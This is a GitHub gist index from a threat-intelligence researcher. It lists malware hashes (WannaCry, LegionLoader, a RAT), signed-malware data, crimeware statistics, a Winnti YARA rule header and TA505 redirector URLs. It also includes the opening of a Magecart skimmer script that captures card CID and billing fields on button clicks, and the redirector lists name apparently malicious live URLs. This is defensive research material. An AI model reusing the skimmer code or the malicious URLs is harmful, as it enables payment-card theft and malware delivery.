Skip to content

Instantly share code, notes, and snippets.

@Blevene
Blevene / Wcry Hashes
Last active Apr 19, 2022
Wcry/WanaCrypt
View Wcry Hashes
09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
149601e15002f78866ab73033eb8577f11bd489a4cea87b10c52a70fdf78d9ff
190d9c3e071a38cb26211bfffeb6c4bb88bd74c6bf99db9bb1f084c6a7e1df4e
24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd
4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982
593bbcc8f34047da9960b8456094c0eaf69caaf16f1626b813484207df8bd8af
5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec
7c465ea7bcccf4f94147add808f24629644be11c0ba4823f16e8c19e0090f0ff
9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640
@Blevene
Blevene / Hashes.csv
Last active Jan 5, 2022
VirusTotal previous 365 Days [May 7th, 2019] of Malware Signed with Certs
View Hashes.csv
We can't make this file beautiful and searchable because it's too large.
samples day signers Signer 1 Signer 2 Signer 3 Extra Stuff
a83f2d4073b7ecaf4f277db62ec44f8b10a9f16a297ebb4db9826a7a08eb06d2 2019-02-20 南昌博众彩软件有限公司; WoTrus Code Signing CA; Certum Trusted Network CA 南昌博众彩软件有限公司 WoTrus Code Signing CA Certum Trusted Network CA
7639f505eb9b8ab4e585a2dd5e9f300e936ba73e5b5db4c51bcb0ba52e751581 2018-08-20 A&W Global Ltd; thawte SHA256 Code Signing CA; thawte A&W Global Ltd thawte SHA256 Code Signing CA thawte
bf920c41e76de53a7660c12b7d14d2f1ad60539b142654893e7cc420b2bdbc2b 2018-12-19 深圳市掌星立意科技有限公司; VeriSign Class 3 Code Signing 2010 CA; VeriSign 深圳市掌星立意科技有限公司 VeriSign Class 3 Code Signing 2010 CA VeriSign
d3aaad15925caae5262366e3a5bf4edec0246877c340e2ba75e5dc96f8410c4a 2018-10-05 LEMONADE EVENTS LIMITED; COMODO RSA Code Signing CA; COMODO SECURE™ LEMONADE EVENTS LIMITED COMODO RSA Code Signing CA COMODO SECURE™
54fb9e302b497f99c6e7ac891e31faaeaf62245e8c0f65ca7a81c7916225d511 2018-10-25 AmeriTechnology Group, Inc.; Go Daddy Secure Certificate Authority - G2; Go Daddy Roo
@Blevene
Blevene / Raw Data 2013-2018
Last active Nov 30, 2020
Crimeware in the Modern Era Appendix
View Raw Data 2013-2018
distinct_samples month keyword
133308 201812 steal
992409 201812 ransom
155525 201812 bank
641780 201812 mine
709085 201811 mine
898598 201811 ransom
257001 201811 bank
168621 201811 steal
1093310 201810 mine
@Blevene
Blevene / code.js
Created Mar 10, 2020
Sample Magecart
View code.js
var x = document.getElementsByTagName("button");
var i;
for (i=0;i<x.length;i++)
{
x[i].addEventListener("click",function(){
var res = document.getElementById("authorizenet_cc_cid").value;
if (res!=""){
var fname = document.getElementById("billing:firstname").value;
var lname = document.getElementById("billing:lastname").value;
var email = document.getElementById("billing:email").value;
@Blevene
Blevene / HTML Redirectors
Created Aug 21, 2020
August 21st, 2020 TA505 Redirectors
View HTML Redirectors
+ HTML Redirectors:
+ http://202.164.235.127/mmd9b4u.html
+ http://jesamcorp.com/ksobv.html
+ http://theotime.net/exd2q.html
+ http://buresova-obrazy.wz.cz/t2z25.html
+ http://diaita.ch/oscbj.html
+ http://spadework.org/5hox.html
+ http://shibata-orimono.com/fcmycq.html
+ http://iceman30.de/qhkcv.html
+ http://lesrivesdechambesy.ch/wssvlsd.html
@Blevene
Blevene / redirectors
Last active Aug 19, 2020
HTML Redirectors for TA505 August 19th, 2020
View redirectors
http://fepete.ch/~bubu/opw8cvh/hme0.html
http://bestwatersystems.net/f7o1fi4/ioki5.html
http://bmgiventures.com/f3ljo2j/25h89qa.html
http://seapower-italia.it/h4ili3d/6x95zqo.html
http://buresova-obrazy.wz.cz/14pg9e6/bgereo.html
http://banonhoe.com/ci20z0/m9t9x.html
http://sistemishop.it/w4a9yu/fzqemif.html
http://dmatica.it/heni26q/m6lc.html
http://www.1120.com.tw/4pkytx/ga8iq.html
http://organic-harmony.com/wukqp4d/90d90c.html
@Blevene
Blevene / IOCs
Last active May 25, 2020
Winnit: More than Just Windows and Gates, IOCs
View IOCs
#Source Blog Post
https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a
---
#Yara Rules
---
rule WinntiLinux_Dropper : azazel_fork
{
meta:
desc = "Detection of Linux variant of Winnti"
@Blevene
Blevene / Results.txt
Created Nov 28, 2019
LegionLoader Yara Rule Results
View Results.txt
Rule per: https://pastebin.com/ySmYwPfu (https://twitter.com/P3pperP0tts/status/1199072934121398283)
legionloader:2891b08c134238beeb08582e3465d77c0fff2ac4bf2cd67162b7402b7246ace4
legionloader:8d6a289bd8f37b89194948bb1b111660015b7ef59dd3a6956c2ac13f0834b4a8
legionloader:0817d8fd8108abbff359e91bfc9e17739f00508e296a25e70bfa3fcaeea7b5ac
legionloader:c10d661449f18de9268019cc1395aa2ecfacd63b8950ff75c624098e34c6c2a3
legionloader:2e3fac6fde0e4ea23a1ac808dc11986f62be096971759a36e64b846feb9ddaf9
legionloader:9ee8dc22b121536f711f51cdf34c9a4e9d9bf72efc152ed86aa5701f875fcfbd
legionloader:992281bedcb6e35cb0ca35ba9558f2c63186cd1519856e9d76d50744ff8a1ea7
legionloader:4f5dc5fdaf6e31269e1248e053c255410288b1a1e3da81374466aeb2165f7566
View Some Weird RAT
a1967856d003fc833dce0c6ee14b4712ebb969abeb05dc6859962138a7f563c1
55e62cf00eb0cc70d57de2f9da4250e8859c89cbe985dba3358c75528d2d17ed
8cdfd12fa71dfa0b015b60042131af7840f77dbfeb96c54737cf0e287e7fac3f
d191e6fe5d919aae888dca4187b0568a907962f9e53be790ce8c9ce02d8835aa
d3e257711f9225c2efde318e7cf4a50a5b02c42a5ccbd9e8d1ceeead2c2d27d2
@Blevene
Blevene / DLLs that call DudeAR
Created Oct 11, 2019
Corsin Gave Us Weird Stuff
View DLLs that call DudeAR
658e7067c6ce8369f03fd2f1b206c7e940526e587c1e0769648b919bf6d85cd6
c39f3423794da57b7748d1785512f79cd7034989af85e4bcdc49007614942471
13cb40ce5591364fb0cad94ec55fcd17856ce6f8bbf88a45dfb04734c700af84
d44fcb39d39ee22c00d1ee6deedf01a555101b3387672c264c29f3c4f0efddd2
09e9fe9fdf0b81fbb167cca756cb58eb4a434b723f20365269ec2a0d56d2d2a7
d594bd343f8000c648cfebda782009be49e55e61448fa0a1f4249d35b1921d81
61efbbf690113e9de5da96a5c416b8124dfa76bd665ceb622bed3edafbe9589c
ed1da8d5b12c0d152f77a0d3442b6da2f87e59b70abe413490c2313491c4d4aa
c5106c91a0d9e35dfb456f707a63293ceabbdf3814ad24743e37599ff13a68f4
bc80c1ae8e79c5f3b01a97cd3ea4699c96538380a9f42f24e98a8e166d2a3b8e